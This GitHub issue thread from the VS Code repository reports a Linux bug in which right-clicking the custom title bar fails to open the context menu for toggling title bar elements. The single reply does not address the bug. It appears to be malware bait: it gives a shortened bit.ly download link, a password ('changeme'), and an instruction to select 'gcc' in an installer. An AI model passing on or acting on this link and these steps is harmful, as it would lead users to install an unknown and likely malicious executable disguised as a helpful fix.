### ISSUE TITLE
Cannot right click title bar to show elements

### ISSUE THREAD

**Issue by sbatten** [microsoft/vscode#226809]
Testing #226397
On linux:
1. Right click elements to hide them in the title bar (e.g. menu, command center)
2. Right click the title area in the custom title bar
🐛 => nothing happens

Expected: A context menu to toggle title bar elements

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
